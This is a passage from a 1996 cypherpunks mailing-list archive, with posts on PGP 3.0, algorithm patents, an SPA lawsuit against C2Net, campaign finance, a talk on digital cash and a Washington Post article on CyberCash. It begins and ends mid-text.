introduction, and validates Schwartau as one of the major players who
brought Information Warfare into focus as "one that affected the primarily
the economic infrastructure of the nation.  ...And his taxonomy of Class 1,
2 and 3 information warfare is a meaninful organization of ideas upon which
a serious study of the concept of information warfare - particularly where
concern with economic infrastructure is concerned.  Winn Schwartau's second
edition of "Information Warfare - Cyberterrorism:  Protecting Your Personal
Security In the Electronic Age" examines IW in its broadest context."

This book is a must for all teaching facilities on the subject of IW.
Professor, Dr. Dorothy Denning is an example of distinguished academia from
Georgetown University. States Denning. " I'll be using it in COSC 511:
Information Warfare: Terrorism, Crime, and National Security".  

Among the contributing authors are LCdr. Robert J. Garigue, Martin Libicki,
Daniel and Julie Ryan, Charles Swett, Carlo Kopp, Peter Radatti,  Capt.
Roger D. Thrasher, Matthew G. Devost, Simon Davies, Dr. Phillipe Baumard and
a score of others representing a global view on the subject.

FOR FURTHER INFORMATION CONTACT:

THUNDER'S MOUTH PRESS
212.780.0380

YOUR LOCAL BOOKSTORE

OR ORDER FROM THE NCSA AT
717.258.1816

****************************************************************
DIRECT REQUESTS to:    list@infowar.com with one-line in the BODY, NOT in
the subject line.

Subscribe news_from_wschwatau  TO JOIN GROUP
Unsubscribe news_from_wschwartau  TO LEAVE GROUP

****************************************************************

http://www.Infowar.Com
Managed by Winn Schwartau
winn@infowar.com
Interpact, Inc.
11511 Pine St.
Seminole, FL  33772
813-393-6600  Voice
813-393-6361   FAX

Comments, Content, Sponsor Opportunties
Betty O'Hearn
Assistant to Mr.Winn Schwartau
betty@infowar.com
813-367-7277   Voice
813-363-7277    FAX



 










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 24 Oct 1996 02:48:12 -0700 (PDT)
To: lcs Remailer Administrator <mix-admin@nym.alias.net>
Subject: Re: MD5?
In-Reply-To: <199610231610.MAA14566@charon.MIT.EDU>
Message-ID: <326F3B5E.15FB7483@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


lcs Remailer Administrator wrote:
> 
> Derek Atkins <warlord@ATHENA.MIT.EDU> writes:
>
> > It'll be released when it's done, dammit!  And it's almost done!
> > Currently, I'm tracking down a few bugs, and a few details need to get
> > solidified, but other than that I have it working on my desktop and I
> > use it almost every day.
> >

> Is there any way to I could possibly get a snapshot of the source code
> if I agree not to bug you about it?  I have some servers that use PGP
> pretty heavily, and will come under immediate preassure to upgrade to
> 3.0 as soon as it is released.  Any head start I can get would be
> really really helpful.

I would sooner see the specs released - I for one would really like to
know the new key ring formats, packet formats etc.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 24 Oct 1996 03:00:57 -0700 (PDT)
To: janke@unixg.ubc.ca
Subject: Re: I'm Confused about Algorithm Patents in Canada
In-Reply-To: <199610240556.WAA01358@clouds.heaven.org>
Message-ID: <326F3E61.ABD322C@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


janke@unixg.ubc.ca wrote:
> 
> I have a library of crypto goodies that I would like to release,
> but am kinda stuck on the copyright: I read in a very new book that
> algorithms cannot be patented in Canada. In AC2, however, Scheneier
> mentions several of the algorithms as being patented in Canada.
> Today, I visited Ascom's home page and noticed that IDEA is not
> patented here, so I get the feeling the law might have changed
> just recently. If anyone can tell me anymore of what they know about the
> status of algorithm patents in Canada, or if they could point
> me to a good source of info on the net, I would be very appreciative.
> (Since my library will be free, you might be helping more than just
> me too. :) )


Yes, this certainly seems to be a grey area.  For instance, the MD of
Digicash said recently that they have a worldwide patent on blinding,
but I am a little puzzled by this - I thought the patents had to be
applied for in each country individually.  Also, Article 52(1) of the
European Patent Convention (EPC) reads:

	"European patents shall be granted for any inventions which are
        susceptible of industrial applications, which are new and which
        involve an inventive step."

        The EPC does not define what is meant by inventions, but Article
        52(2) lists subject-matter and activities "which shall not be
        regarded as inventions" within the meaning of Article 52(1), in
        particular:

        - discoveries, scientific theories and mathematical methods
                                               ^^^^^^^^^^^^^^^^^^^^
        - aesthetic creations
        - schemes, rules and methods for performing mental acts, playing
games
              or doing business, and programs for computers
                                     ^^^^^^^^^^^^^^^^^^^^^^
        - presentations of information

I no nothing of patent law, but this certainly does seem to imply that
algorithms themselves cannot be patented in Europe.  Any European patent
experts out there?

 
Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Thu, 24 Oct 1996 12:34:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: LAWSUIT DROPPED; SPA STILL DEMANDS MONITORING
Message-ID: <199610241934.MAA17056@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


For Release October 24, 1996
Contact: Sameer Parekh 510-986-8770

	    LAWSUIT DROPPED; SPA STILL DEMANDS MONITORING

Oakland, CA - In an ongoing attempt to force Internet Service
Providers (ISPs) to monitor their customers' web pages, the Software
Publisher's Association (SPA), acting on behalf of three member
software companies, dropped a lawsuit against Community ConneXion,
Inc., dba C2Net, but reserved the right to bring the suit again if
C2Net failed to adopt a policy of monitoring their users' web pages
for copyright infringement.

The three plaintiffs, Adobe Systems, Inc., Claris Corporation, and
Traveling Software, Inc., seemed surprised to find that they had filed
the lawsuit, and sought to distance themselves from the action. For
instance, Adobe's PR department maintained that Adobe has definitely
not filed any such lawsuiT. (Contact Carol Sacks -- (408) 536-4033)

C2Net, a small, Oakland-based ISP and software company, has always
forbidden illegal activity on its servers. This includes copyright
infringement and contributory copyright infringement.  "We're very
aware of the problems that software companies face from piracy; most
of our revenue comes from software and we have our own problems with
people pirating our software," said C2Net President Sameer Parekh. "I
just don't think that bullying hard-working ISPs into embracing a
highly questionable set of policies does anything constructive about
the problem of piracy."

The Software Publishers Association wants ISPs to sign a 'Code of
Conduct' which would force ISPs to actively monitor users.  Under
current case law, this greatly increases the ISP's liability, in
addition to being extremely expensive, time-consuming, and distasteful
to users.

"The telephone company isn't required to monitor all their users to
make sure they're not saying illegal things," said Parekh. "How can we
be expected to do that for our customers' use of the Internet?"

Of the over twenty ISPs contacted by the SPA, many caved in and signed
the 'Code of Conduct', fearing a lawsuit from the SPA more than the
future expense and liability problems that result from ongoing
monitoring. A coalition of ISPs and other concerned parties, the ISP
Defense Coalition, has formed to oppose these bullying tactics by the
SPA.

"The SPA thought they could bully small ISPs, but they didn't 
realize we had principles and couldn't be cowed," said Parekh.

Mike Godwin, Staff Counsel for the Electronic Frontier Foundation
said, "My personal view is that the Software Publishers Association
has forgotten that it is the legislature, not the courts, that is the
primary avenue for seeking changes in copyright policy.  What we see
here is a perversion of the notion that the courts should be used to
seek justice -- SPA seems to have picked defendants in the hope that
they'd be too weak to resist. I find that decision morally
objectionable. Speaking as a lawyer, I have to say that this is the
kind of tactic that justifiably confirms in people's minds whatever
low opinions they may have of lawyers."

The suit alleged that C2Net users were providing tools to get around
copy protection in the plaintiffs' software, and were providing
pointers to other sites that actually contained pirated software. The
SPA provided no examples, and did not allege any direct copyright
infringement on C2Net machines.

"Despite our best efforts to get specific information," said Parekh,
"the SPA did not provide us with any specifics about our customers
engaging in infringing activity. We suspect that they had no evidence
of infringement, but acted merely on vague reports of questionable
conduct on the part of a few users."

C2Net provides high-security encryption solutions for the Internet
worldwide.  More information about C2Net's products are available at
https://stronghold.c2.net/. Information about the forming coalition
may be found at https://www.c2.net/ispdc/.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 24 Oct 1996 10:16:49 -0700 (PDT)
To: declan@well.com (Declan McCullagh)
Subject: Re: NSA Report: Anyone seen this?
In-Reply-To: <v01510101ae95249e194c@[204.62.128.229]>
Message-ID: <v0300781dae955405a722@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:52 am -0400 10/24/96, Declan McCullagh wrote:
> Just got off the phone with the NSA.
>
> "<snip...> ...Did
> you read about it on the Internet?"

Duh?

;-).

Another industrial communication heirarchy snagged in a geodesic world.

Yup. Duncan's right. The Chixalub(sp?) comet has fallen. The dinos *are*
dying, ladies and germs...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 24 Oct 1996 10:21:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: to whoever runs the "best of security list"
Message-ID: <199610241717.NAA04791@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I've noticed that frequently when I send a message to cypherpunks,
someone forwards the message to some list called, I think, "best-of-security".

I have no idea who runs this list or who is forwarding my messages to it,
but the list appears to be badly misconfigured.  Every time one of my
messages gets forwarded, I get literally two or three dozen bounce messages
from undeliverable recipients on that list.  My guess is that the best-
of-security list software incorrectly identifies the original message
author, instead of the list owner, as the originator of messages, and so
errors are sent to the wrong place.

So to whoever is running the best-of-security list: please either
fix your list software or stop forwarding my messages to it.

Thanks

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 24 Oct 1996 10:19:27 -0700 (PDT)
To: Matts Kallioniemi <cypherpunks@toad.com
Subject: Re: Netescrow & Remailers?
In-Reply-To: <3.0b36.32.19961024162651.0093fab0@localhost>
Message-ID: <v0300781eae955525eac7@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:28 am -0400 10/24/96, Matts Kallioniemi wrote:
> This way there would never be any abuse complaints on IN remailers because
> they are invisible. When an OUT remailer is taken out nobody gets hurt
> because OUT remailers will never be used in reply blocks.

Right. And, of couse, the OUT remailers charge *money*, payable to "whom it
may concern"... :-).

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WEB Tech #5 <webtech5@rollerblade.com>
Date: Thu, 24 Oct 1996 11:18:49 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: Rollerblade Inc. Message
Message-ID: <c=US%a=_%p=Rollerblade._Inc%l=EXCHANGE-961024181901Z-1462@mail.rollerblade.com>
MIME-Version: 1.0
Content-Type: text/plain


Today I responded to a rant per request of a cypherpunks@toad.com
member.  I now have been informed that the above news group is not a
general use news group.  I apologize for any extraneous,
non-cryptographic related material that would have been forwarded to all
of you earlier today.  To illustrate my point, this situation would be
similar to someone calling and leaving a message to return the call but
deliberately listing the incorrect phone number.  I have received
numerous replies from many of you and have responded to as many as
possible explaining the situation as best I can. 

Being a webtech for a high e-mail volume company like Rollerblade,
topics in cryptography are becoming very important to me.  You can bet
that I will be visiting your Cypherpunks sites frequently to keep up
with the latest trends in cryptographic technologies.  

Please excuse my oversight of sending an e-mail reply to an unknown news
group, this situation has definitely opened my eyes to another important
NETicate rule.  Thanks for your understanding.

Skate the World!!!

Webtech5
Rollerblade Consumer Service





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Thu, 24 Oct 1996 11:40:51 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Stopping the buying of candidates
Message-ID: <199610241840.NAA05148@earth.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


This is my last reply.  I guess I forgot your overarching theory. 
Reality, nah.

(snip)
> No, I didn't say I was "cutting off all prediction of money appearing."   
> But it would be a long shot from having particular donor's names associated 
> with particular dollar figures.  And, the system would simply have to 
(snip)

It's not a long shot.  When Bob the Big Bad Lobbyist comes into the 
Senator's office and leads him to believe a donation will be made and 
magically a sizeable one does, it can be reasonable infered from 
whence it came.  In the real world, politicians have access to the 
names and addresses of people who regularly donate to political 
campaigns.  Trust me, the probability of others, i.e. regular working 
people, donating to campaigns is zero to none.  There is a finite 
pool of political campaign money out there.

> >> Try again.  Rather than trying to prove that a system won't work, why not 
> >> help develop one that will?
> >
> >Why don't you run for office.  I did.  Reality, after all, is far 
> >better than theory.
> 
> I'd prefer doing something far more...uh...permanent than to merely REPLACE 
> officeholders.

My fault.  I forget whom I was replying to.  Of course my reply above 
was in response to your question about developing a "working" system. 
Have fun in your politicianless world (with no physical 
infrastructure, information infrastructure, national defense, etc.)  
I would much rather leave it to the market.  There is, of course, no 
corruption there. (WINK) 

> >Every candidate ever endorsed by the Firefighters Union in my town 
> >have been absolutely elected.  Looking at the firefighters voting 
> >records and matching with their addresses shows a distinct pattern of 
> >voting in almost every election. 
> 
> "Firefighter's voting records"?  I _thought_ we had a secret ballot in this 
> country.  Maybe you're from some  town that I don't know about!

I, unlike some people, live in the real world.  It is trivial for 
political groups to put together listings of public employee 
addresses, their VOTING records (meaning whether they voted or not, 
check with your city hall...hmmm...go figure, they keep track of 
that) and public expressions of support (i.e. lawn signs, letters to 
the editor, rally attendance).  Compile this info and you have a 
pretty good handle on who voted for whom (Yes I know it cant show 
absolutely that someone voted a certain way, but most of campaigning 
is simple probability.  I dont have the time to explain this in 
detail, look it up if you are really interested).

> Besides, what you're saying can be considered a bit of self-fulfilling 
> prophecy.  Some cities ALWAYS vote one way, or another.  Over time, public 
> employees simply adjust their politics to match their wallets, etc.  
> Remember, these are PUBLIC employees after all, which really just means the 
> employeees of the thugs who get into office.  It does not serve their 
> interests to go against the winning candidate.  If, one year, the party 
> normally out of office appears to be winning, the Firefighters will simply 
> adjust their politics accordingly.  Simple.

What you are not getting is that, in this case, the public employees 
are the edge that causes the win.  We have had some close races, the 
winning margin is clearly less than the number of voting public 
employees.  You don't need to control all the votes.  Only the sure 
number that you can "deliver", the need for which can be discerned 
fairly easily (using those nasty historical voting records).

> 
> > They have sufficient numbers to win every time.
> 
> Whichever candidate wins, "has sufficient numbers to win."  Tell me 
> something else I don't know.
> 

This came from a discussion of vote delivery.  X has a block Y that 
will vote for Z (the endorsed candidate) every time.  If victory 
margin is less than Y, X's delivery controls the race.

> >Power currupts.  Not size of governement. 
> 
> Size of government is evidence of the size of the corruption.
> 

Unproven.  Apparently you don't believe that some monarchies, which 
can be extremely small governments, have been some of the most 
corrupt in history.  As I stated above, power corrupts.  It is an 
easy way out of arguments for libertarians and most republicans to 
say that big government is the root of all evil.  

Quite simply put, it is people that are the arbiters of their free 
will.  People are the root. 

> Jim Bell
> jimbell@pacifier.com

Matt 
++++==============----------------------------
Matthew J. Miszewski |The information revolution has changed wealth: 
		     |intellectual capital is now far more important 
mjmiski@execpc.com   |than money.		-Walter Wriston
                         ----------------------------==============++++




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Thu, 24 Oct 1996 08:38:17 -0700 (PDT)
To: "geeman@best.com>
Subject: Re: probability question for math-heads
In-Reply-To: <326EAA23.2DB1@best.com>
Message-ID: <Pine.3.89.9610241300.A4269-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 23 Oct 1996, geeman@best.com wrote:
> I'm too tired &/or busy to work this out, via Knuth --- maybe you can 
> help, with some implications for the DES keysearch strategy.
> 
> What is the expected distribution, in a "random" binary sequence  -- 
> with all the fuzziness that implies as to what _exactly_ is "random" -- 
> of gaps between runs of same-bits. 
> 
> i.e. what is the expected distribution of sequence length between 
> occurances of two (and only two) 1-bits in a row?  how about sequences 
> of 3 1-bits?  ETc.
> 
> We know that in a _truly_ random sequence, taken over a long enough 
> period, there should be all possible values of "gaps".  But what is
> reasonable to expect in a "random" sequence as to how those gaps are 
> distributed?  Is my question equivalent to Knuth's gap test?
> 
> If anyone feels like proffering some education on this, if I find 
> anything useful in my investigations I'll certainly credit the help!

The math heads are busy doing math, so I'll answer instead.

The probability goes 1:2^1...  1:2^2...   1:2^3...   1:2^4...

Two bits hold 4 possible values, 2 of which are bit-alike.  Three bits 
hold 8 possible values, 2 of which are bit-alike, of course.

1:2^(bits-1) is exactly what you would expect from a RANDOM sequence.  
This was also implied in the followups to your previous thread re: DES 
keyspace optimization.  Remember the Gambler's Fallacy...

Regards,
Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 24 Oct 1996 11:07:41 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,
In-Reply-To: <9Hg0VD1w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961024140838.16354B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Paul Bradley <paul@fatmans.demon.co.uk> writes:
> 
> > > 
> > > Yes. Timmy May is a fat turkey.
> > 
> > Doctor Vulis, you do indeed enlighten us mere mortals in an 
> > astonishing way with your witty commentary and razor sharp mind.
> 
> Thank you for the compliment.
> > 
> > How long did it take you to think of the above insult?
> 
> No more than a second. You see, I have better things to do that engage
> in flame wars, unlike Timmy May who spends hours glued to his terminal,
> trying to invent new flame baits and chortling at his supposed cleverness.


And just what is it you think you are doing with comments such as "Timmy 
May is a fat turkey" if not starting flame wars?  Hrmmmm?

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 24 Oct 1996 11:12:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: "So Says I", 10/24 ISIG Meeting
Message-ID: <v03007801ae956125a112@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Thu, 24 Oct 1996 13:58:24 -0400 (EDT)
X-Sender: mcooley@tiac.net
Mime-Version: 1.0
To: Robert Hettinga <rah@shipwright.com>
From: mcooley@nethorizons.com (Marianne Cooley)
Subject: "So Says I", 10/24 ISIG Meeting

fyi

>Date: Tue, 22 Oct 1996 15:45:27 -0400 (EDT)
>X-Sender: mcooley@tiac.net
>To: isig@bcs.org
>From: mcooley@nethorizons.com (Marianne Cooley)
>Subject: "So Says I", 10/24 ISIG Meeting
>Sender: owner-isig@bcs.org
>Precedence: bulk
>Reply-To: isig@bcs.org
>
>Join us for a great evening at MIT, Building 6, Room 120 for the latest ISIG
>meeting.  Here's the scoop on the main presentation which starts at 7 pm:
>
>"So Says I**": Financial cryptography, microintemediation and the power of
>reputation in a ubiquitous geodesic economy.

< Actually, "I" is "Joe Nebuchannezar" ;-), RAH>

>(That really means there's a whole lotta' shakin' goin' on in the area of
>electronic money!)
>
>
>** "I" is Bob Hettinga, the founder of the Digital Commerce Society of
>Boston, and resident man with opinions on most aspects of e$$
>
>
>Obviously, the net is going to give us the ability for anyone, anywhere, to
>buy anything.  No matter where the buyer or seller is, or, for that matter,
>where the thing being sold is.
>
>However, financial cryptography, the technology which underlies digital
>commerce, will have much more profound implications than merely the
>simplification of sales and distribution. It permits us to make anonymous
>*cash* transactions for everything from a billion-dollar foriegn exchange
>trade to possibly even switching internet packets themselves.
>
>If this promise is kept, it could change the fundamentals of our entire
>society. It forces profit and loss responsibility further and further down
>into organizations until they break up into smaller competing operating
>units. It makes book-entry transactions like checks or credit cards
>obsolete, and replaces them with strange stuff like digital cash and
>personal digital bearer bonds. It creates cash-settled auction markets for
>practically anything. People joke about routers and switches which save up
>enough from their traffic-tolls to buy copies of themselves. About
>micromoney as processor food.
>
>On a macroeconomic scale, all of government's revenue sources are
>book-entry taxes, like those on sales, income, and capital gains. "What
>happens when taxes become a tip?", some people have asked. That is, if
>government can't trace transactions anymore, because of the very way those
>transactions executed, how will government be funded?
>
>Disintermediation is a common buzzword in the financial markets. It is
>usually meant to describe what mutual fund companies have done to banks.
>What happens when mutual funds become microintermediated?
>
>In this talk, we'll look at all of this, and what the world might look like
>if Moore's Law and strong cryptography do manage to create a geodesic
>economy.
>
>>From 6:30-7pm, we had expected to have a demonstration of Black Diamond's
>web video software, but we haven't quite solved the technical details...(it
>is active X, and we can't get that on a UNIX machine yet ;)  )  I am still
>expecting that one of their representatives will be joining us.  We will
>also have the usual Q&A during that time.
>
>If you don't know where Building 6 Room 120 is, the simplest way to describe
>it follows:
>
>Go to the main entrance of MIT on Mass Ave and walk up the steps into the
>domed building.  Go straight ahead into the long hall ("the infinite
>corridor".)  Keep walking until you reach the sign that says Building 6,to
>the right.  Turn down the hall to the right until you reach room 120 on your
>right.
>
>
>Looking forward to seeing you all!
>
>Cheers,
>Marianne
>*********************************************************************
>
>       Marianne Cooley            Internet Special Interest Group
>       NetHorizons Unlimited      Coming Soon!  A *new* Boston Group
>       mcooley@nethorizons.com
>       617.433.0825
>
>Join "Life at Internet Speed" on www.boston.com Wednesdays from 1-2pm!
>For a chat topic reminder, send an email to chat-reminder@nethorizons.com
> with your full name and email address in the body of the message.
>**********************************************************************
>
>
>
>
*********************************************************************

       Marianne Cooley            Internet Special Interest Group
       NetHorizons Unlimited      Coming Soon!  A *new* Boston Group
       mcooley@nethorizons.com
       617.433.0825

Join "Life at Internet Speed" on www.boston.com Wednesdays from 1-2pm!
For a chat topic reminder, send an email to chat-reminder@nethorizons.com
 with your full name and email address in the body of the message.
**********************************************************************


--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Thu, 24 Oct 1996 11:21:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Yet-another Czar
Message-ID: <199610241820.OAA227944@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 24 Oct 1996 14:07:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS]
Message-ID: <BsFBwD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Washington Post: Monday, October 21, 1996

CyberCash: Change Is Good, They Bet

By David S. Hilzenrath

Somewhere in cyberspace, shrouded in anonymity, someone surfed to the World
Wide Web site for Virtual Vegas last Friday and saw casino betting tips for
sale for 50 cents. With a few clicks of a computer mouse, using software
called a "wallet," the surfer ordered the tip sheet. Almost instantaneously,
the gambling advice crossed the Web to the buyer's computer, and payment
traveled to the Web site in a new form of electronic money known as CyberCoin.

When Virtual Vegas settles its accounts, the encrypted CyberCoin payment will
be converted into a 42-cent deposit in the business's bank account. Its bank
and the buyer's bank will share a fee of 2 cents, and CyberCash Inc., the
Reston company that issued the electronic money, will cut itself in for 6
cents.

Mere pennies -- but multiply the transaction by a zillion here and a zillion
there and someday the company could be making real money.

One of the Internet's hottest and most speculative stocks, CyberCash has
emerged as the early front-runner in a race to handle the pocket change of
electronic commerce, many merchants and analysts say. In the process,
CyberCash could help transform the way people do business on the Internet,
making it easier to buy and sell inexpensive items such as individual news
articles, pictures, video-game plays, computer software, recipes, jukebox
selections -- or odds on the third race at Belmont.

"When the Internet comes into its own, and it will come into its own, then
CyberCash and its competitors will have provided a key mechanism for going
from worldwide chaos to worldwide commerce," said Ira Morrow, a financial
services analyst for the Gartner Group.

It's big talk about a tiny company that in the first six months of this year
had only $ 37,705 in revenue and has yet to show a profit. Moreover, the
company is one of many betting on an explosion of on-line commerce that more
than a few savvy observers say may never come.

"Are people really going to want to do real commercial transactions on the
Internet? A lot of us involved in this aren't sure," said Sholom Rosen, vice
president of emerging technologies at Citibank and point man for the bank's
experiment in Internet currency. "There's more smoke out there than there is
fire right now . . . more hype than there is reality in the marketplace."

Until about two weeks ago, some analysts considered CyberCash's prospects to
be tenuous at best. Then Netscape Communications Corp. agreed to package the
CyberCash wallet with its Netscape Navigator software, by far the most widely
used "browser" for surfing the Web. Suddenly, CyberCash appeared more
plausible.

"CyberCash, with the Netscape deal, has emerged with some kind of a leadership
position . . . some clear viability," said Kris Tuttle of SoundView Financial
Group, a technology research firm.

CyberCash introduced a system for secure on-line credit card payments in 1995,
but by its own account it will be just one of many players following a
standard approach in that arena. It is also developing a system for on-line
check payments. But it is CyberCoin, which debuted on Sept. 30, that holds the
key to CyberCash's fortunes -- and the greatest potential to shake things up
in cyberspace. With CyberCoin, the company is trying to facilitate purchases
of 25 cents to $ 10, transactions typically too small to be made by credit
card.

The system could allow Internet merchants to charge for things they have been
giving away, or to charge nominal tolls for visiting Web sites. It could allow
virtual vendors to charge "by the sip" instead of by the bottle, as some
industry analysts say -- for example, to eliminate costly subscription fees
for on-line publications when the reader only wants a single story.

"It seems to be the answer everybody's been looking for to make small-amount
purchases on the Internet," said Ned Barnett, marketing director of
HealthWorld Online Inc., which plans to use CyberCoin to sell chapters of
books and brief audio recordings about nutrition and health on the Internet.

The folks at Virtual Vegas agree, but their own receipts should temper such
enthusiasm. As of Friday, Virtual Vegas, based in Venice, Calif., had rung up
just 48 CyberCoin transactions for a grand total of $ 40.05 in sales.

Only a dozen merchants are currently equipped to accept CyberCoin payments.
Another 33, including the Los Angeles Times, have signed up to use the system.
Netscape won't begin distributing the wallet software to consumers until next
year; in the meantime, it can be downloaded for free from CyberCash's Web
site, www.cybercash.com.

But to CyberCash co-founder and chief executive William N. Melton, it's a
fairly good bet. And Melton has a history of good bets. In a prior life, he
created VeriFone Inc., building it into the world's largest provider of
credit-card terminals, which retailers use to verify transactions. He serves
on the boards of America Online Inc. of Dulles, the world's largest on-line
service, and Transaction Network Services of Reston, which manages a network
that connects retailers and credit card processors.

Melton, 54, grew up on a farm in Nebraska, where he and his brother and mother
tended to the cows and pigs and chickens. His father, a Methodist minister,
died when he was 7. As a boy, he dreamed of being a truck driver, he said,
because the trucks that rumbled through Nebraska represented freedom.

At West Mar College in LeMars, Iowa, he majored in psychology before going to
Honolulu for graduate work in Chinese language and philosophy. He spent five
years in Asia, traveling to Taiwan, Vietnam and Japan, and returned to Hawaii
fluent in Mandarin.

In 1993, practicing venture capital with his own money, Melton watched the
growth of the Internet and saw its "revolutionary and transformative power,"
he said. He envisioned a need for a kind of VeriFone for the global computer
network, an automated on-line payment system.

"Most of the banking world at that time was not paying attention to this new
[Internet] phenomenon, and most of the people in the Internet were not paying
attention to payments. And so there seemed to be a gap that needed to be
filled," he said.

Melton also perceived a gap in his knowledge of the Internet, and sought out
Daniel C. Lynch, now chairman of the CyberCash board, to fill it. Lynch, 55,
one of the Internet's pioneers, had already made a fortune of his own by
creating and selling Interop Co., which ran Internet trade shows. Lynch also
served on the board of UUNet Technologies, the Internet services company
recently bought by MFS Communications.

Early in his career, as a computer programmer for the U.S. Air Force, Lynch
wrote software for missile-tracking radars. But in the early 1970s he decided
that was "a boring game" because "the offense has it all over the defense," he
recalled. Now, Lynch relaxes by working on his own vineyard in Napa Valley.

Melton and Lynch found each other through their mutual interest in bionomics,
the philosophy espoused by author Michael Rothschild in a 1990 book by that
title. Bionomics views the economy as organic and evolutionary, like a rain
forest, and doubts the power of governments or other institutions to direct
it. The two entrepreneurs became sponsors and directors of Rothschild's
Bionomics Institute.

Rothschild describes Melton and Lynch in contrasting terms. "Bill is a man of
few words. To me he's sagelike, just very wise," Rothschild said. Lynch "is
both a mathematical wizard, a hyper hyper techie guy, the super-geek, if you
will . . . and the ultimate party animal."

They met for breakfast one morning in October 1993, and Melton told Lynch
about his ideas. By the time Rothschild arrived, late for the meeting, the two
were planning a business.

Initially, they financed the venture themselves. "We're two guys that could
write checks for millions of dollars, and if we lost, we lost," Lynch said.
"We were going to shake the world up."

As the company developed, they watched the share prices of publicly traded
Internet upstarts, such as Netscape, rise to stratospheric heights. By last
winter, it was their turn to play. CyberCash issued stock on Feb. 15, raising
$ 44 million from the public and $ 15 million from Japanese investor Softbank
in a private deal. Initially priced at $ 17, the stock has since traded
between $ 24.75 and $ 63.50 and closed at $ 33 Friday. Melton's $ 4.7 million
investment in the company is now worth $ 75.5 million on paper, and Lynch has
turned $ 2 million into $ 25.6 million.

What made the offering all the more remarkable was not only that CyberCash was
losing millions of dollars at the time, but that it had yet to take in a penny
of revenue. "That was a bit of a rush, wasn't it?" Lynch said.

Today, CyberCash has about 190 employees and offices in Redwood City, Calif.,
and Bangalore, India, where labor costs for programmers are much lower than in
this country.

The CyberCash strategy is to distribute its system to the masses through
